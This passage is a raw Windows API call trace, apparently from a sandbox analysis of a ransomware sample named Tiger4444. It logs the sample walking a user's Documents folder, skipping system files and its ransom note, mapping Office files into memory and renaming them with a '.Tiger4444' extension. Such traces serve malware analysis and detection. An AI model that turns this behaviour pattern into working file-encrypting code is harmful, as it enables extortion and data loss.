lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0046.552] lstrcmpiW (lpString1="My Music", lpString2="NTUSER.DAT") returned -1 [0046.552] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0046.552] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Music", dwFileAttributes=0x2412) returned 1 [0046.552] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Music\r\n") returned 53 [0046.552] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Music\r\n") returned 53 [0046.552] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.553] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x94a [0046.553] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x35, lpOverlapped=0x0) returned 1 [0046.564] CloseHandle (hObject=0x260) returned 1 [0046.564] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="Tiger4444.exe") returned -1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0046.564] lstrcmpiW (lpString1="My Pictures", lpString2="NTUSER.DAT") returned -1 [0046.565] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0046.565] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Pictures", dwFileAttributes=0x2412) returned 1 [0046.565] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Pictures\r\n") returned 56 [0046.565] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Pictures\r\n") returned 56 [0046.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.565] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x97f [0046.565] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x38, lpOverlapped=0x0) returned 1 [0046.567] CloseHandle (hObject=0x260) returned 1 [0046.568] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="Tiger4444.exe") returned -1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2=".") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="..") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="windows") returned -1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="bootmgr") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="pagefile.sys") returned -1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="boot") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="ids.txt") returned 1 [0046.568] lstrcmpiW (lpString1="My Shapes", lpString2="NTUSER.DAT") returned -1 [0046.568] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0046.568] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes", dwFileAttributes=0x10) returned 1 [0046.570] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0046.570] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc7b288 [0046.570] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66448 [0046.570] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="Tiger4444.exe") returned -1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0046.570] lstrcmpiW (lpString1="My Videos", lpString2="NTUSER.DAT") returned -1 [0046.570] lstrcpyW (in: lpString1=0x30aeadc, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0046.570] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Videos", dwFileAttributes=0x2412) returned 1 [0046.570] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Videos\r\n") returned 54 [0046.570] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\Documents\\My Videos\r\n") returned 54 [0046.570] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.571] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0046.571] WriteFile (in: hFile=0x260, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x36, lpOverlapped=0x0) returned 1 [0046.573] CloseHandle (hObject=0x260) returned 1 [0046.574] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71098c60, ftCreationTime.dwHighDateTime=0x1d480c9, ftLastAccessTime.dwLowDateTime=0x92b0e2d0, ftLastAccessTime.dwHighDateTime=0x1d50ad7, ftLastWriteTime.dwLowDateTime=0x92b0e2d0, ftLastWriteTime.dwHighDateTime=0x1d50ad7, nFileSizeHigh=0x0, nFileSizeLow=0x9c0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NojVjWHIt.docx", cAlternateFileName="NOJVJW~1.DOC")) returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="Tiger4444.exe") returned -1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2=".") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="..") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="windows") returned -1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="bootmgr") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="pagefile.sys") returned -1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="boot") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="ids.txt") returned 1 [0046.574] lstrcmpiW (lpString1="NojVjWHIt.docx", lpString2="NTUSER.DAT") returned -1 [0046.574] lstrcpyW (in: lpString1=0x30aeadc, lpString2="NojVjWHIt.docx" | out: lpString1="NojVjWHIt.docx") returned="NojVjWHIt.docx" [0046.574] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NojVjWHIt.docx", dwFileAttributes=0x0) returned 1 [0046.575] lstrlenW (lpString="NojVjWHIt.docx") returned 14 [0046.575] lstrlenW (lpString="Tiger4444") returned 9 [0046.575] lstrcmpiW (lpString1="WHIt.docx", lpString2="Tiger4444") returned 1 [0046.575] lstrlenW (lpString=".dll") returned 4 [0046.575] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0046.575] lstrlenW (lpString=".lnk") returned 4 [0046.575] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0046.575] lstrlenW (lpString=".ini") returned 4 [0046.575] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0046.575] lstrlenW (lpString=".sys") returned 4 [0046.575] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0046.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NojVjWHIt.docx" (normalized: "c:\\users\\fd1hvy\\documents\\nojvjwhit.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.575] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.575] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13802807861) returned 1 [0046.575] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=39950) returned 1 [0046.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0046.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0046.575] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9f10, lpName=0x0) returned 0x2c8 [0046.575] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9f10) returned 0xbe0000 [0046.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.576] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0046.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0046.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.577] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13802973415) returned 1 [0046.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0046.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0046.577] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.577] CloseHandle (hObject=0x2c8) returned 1 [0046.577] CloseHandle (hObject=0x260) returned 1 [0046.578] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\NojVjWHIt.docx.Tiger4444") returned 50 [0046.578] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\NojVjWHIt.docx" (normalized: "c:\\users\\fd1hvy\\documents\\nojvjwhit.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\NojVjWHIt.docx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\nojvjwhit.docx.tiger4444"), dwFlags=0x1) returned 1 [0046.578] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=39952 | out: Addend=0xc6f980) returned 21438144 [0046.578] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4769 [0046.578] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99a7baf0, ftCreationTime.dwHighDateTime=0x1d48ae4, ftLastAccessTime.dwLowDateTime=0x38562a50, ftLastAccessTime.dwHighDateTime=0x1d4ebc6, ftLastWriteTime.dwLowDateTime=0x38562a50, ftLastWriteTime.dwHighDateTime=0x1d4ebc6, nFileSizeHigh=0x0, nFileSizeLow=0x5bd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oLihILFnIluq9HK.xlsx", cAlternateFileName="OLIHIL~1.XLS")) returned 1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="Tiger4444.exe") returned -1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2=".") returned 1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="..") returned 1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="windows") returned -1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="bootmgr") returned 1 [0046.578] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="pagefile.sys") returned -1 [0046.579] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="boot") returned 1 [0046.579] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="ids.txt") returned 1 [0046.579] lstrcmpiW (lpString1="oLihILFnIluq9HK.xlsx", lpString2="NTUSER.DAT") returned 1 [0046.579] lstrcpyW (in: lpString1=0x30aeadc, lpString2="oLihILFnIluq9HK.xlsx" | out: lpString1="oLihILFnIluq9HK.xlsx") returned="oLihILFnIluq9HK.xlsx" [0046.579] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oLihILFnIluq9HK.xlsx", dwFileAttributes=0x0) returned 1 [0046.579] lstrlenW (lpString="oLihILFnIluq9HK.xlsx") returned 20 [0046.579] lstrlenW (lpString="Tiger4444") returned 9 [0046.579] lstrcmpiW (lpString1="q9HK.xlsx", lpString2="Tiger4444") returned -1 [0046.579] lstrlenW (lpString=".dll") returned 4 [0046.579] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0046.579] lstrlenW (lpString=".lnk") returned 4 [0046.579] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0046.579] lstrlenW (lpString=".ini") returned 4 [0046.579] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0046.579] lstrlenW (lpString=".sys") returned 4 [0046.579] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0046.579] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\oLihILFnIluq9HK.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\olihilfniluq9hk.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.579] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.579] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13803237592) returned 1 [0046.579] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=23508) returned 1 [0046.579] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0046.579] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0046.579] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5ee0, lpName=0x0) returned 0x2c8 [0046.580] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ee0) returned 0xbe0000 [0046.580] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.580] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0046.580] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.580] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0046.580] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.581] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0046.581] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.581] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0046.581] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13803372162) returned 1 [0046.581] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0046.581] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0046.581] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.581] CloseHandle (hObject=0x2c8) returned 1 [0046.581] CloseHandle (hObject=0x260) returned 1 [0046.582] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\oLihILFnIluq9HK.xlsx.Tiger4444") returned 56 [0046.582] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\oLihILFnIluq9HK.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\olihilfniluq9hk.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\oLihILFnIluq9HK.xlsx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\olihilfniluq9hk.xlsx.tiger4444"), dwFlags=0x1) returned 1 [0046.582] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=23520 | out: Addend=0xc6f980) returned 21478096 [0046.582] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4770 [0046.582] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0046.582] lstrcmpiW (lpString1="Outlook Files", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.582] lstrcmpiW (lpString1="Outlook Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.582] lstrcmpiW (lpString1="Outlook Files", lpString2="Tiger4444.exe") returned -1 [0046.582] lstrcmpiW (lpString1="Outlook Files", lpString2=".") returned 1 [0046.582] lstrcmpiW (lpString1="Outlook Files", lpString2="..") returned 1 [0046.583] lstrcmpiW (lpString1="Outlook Files", lpString2="windows") returned -1 [0046.583] lstrcmpiW (lpString1="Outlook Files", lpString2="bootmgr") returned 1 [0046.583] lstrcmpiW (lpString1="Outlook Files", lpString2="pagefile.sys") returned -1 [0046.583] lstrcmpiW (lpString1="Outlook Files", lpString2="boot") returned 1 [0046.583] lstrcmpiW (lpString1="Outlook Files", lpString2="ids.txt") returned 1 [0046.583] lstrcmpiW (lpString1="Outlook Files", lpString2="NTUSER.DAT") returned 1 [0046.583] lstrcpyW (in: lpString1=0x30aeadc, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0046.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0046.583] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x50) returned 0xc5e610 [0046.583] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66668 [0046.583] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c8ca30, ftCreationTime.dwHighDateTime=0x1d5024d, ftLastAccessTime.dwLowDateTime=0x752b45c0, ftLastAccessTime.dwHighDateTime=0x1d4e868, ftLastWriteTime.dwLowDateTime=0x752b45c0, ftLastWriteTime.dwHighDateTime=0x1d4e868, nFileSizeHigh=0x0, nFileSizeLow=0xdd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qX7qJ7WfX.pptx", cAlternateFileName="QX7QJ7~1.PPT")) returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="Tiger4444.exe") returned -1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2=".") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="..") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="windows") returned -1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="bootmgr") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="pagefile.sys") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="boot") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="ids.txt") returned 1 [0046.583] lstrcmpiW (lpString1="qX7qJ7WfX.pptx", lpString2="NTUSER.DAT") returned 1 [0046.583] lstrcpyW (in: lpString1=0x30aeadc, lpString2="qX7qJ7WfX.pptx" | out: lpString1="qX7qJ7WfX.pptx") returned="qX7qJ7WfX.pptx" [0046.583] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qX7qJ7WfX.pptx", dwFileAttributes=0x0) returned 1 [0046.583] lstrlenW (lpString="qX7qJ7WfX.pptx") returned 14 [0046.583] lstrlenW (lpString="Tiger4444") returned 9 [0046.583] lstrcmpiW (lpString1="7WfX.pptx", lpString2="Tiger4444") returned -1 [0046.583] lstrlenW (lpString=".dll") returned 4 [0046.583] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0046.583] lstrlenW (lpString=".lnk") returned 4 [0046.583] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0046.583] lstrlenW (lpString=".ini") returned 4 [0046.583] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0046.583] lstrlenW (lpString=".sys") returned 4 [0046.583] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0046.584] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\qX7qJ7WfX.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qx7qj7wfx.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.584] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.584] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13803676662) returned 1 [0046.584] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3541) returned 1 [0046.584] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0046.584] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0046.584] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10e0, lpName=0x0) returned 0x2c8 [0046.584] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 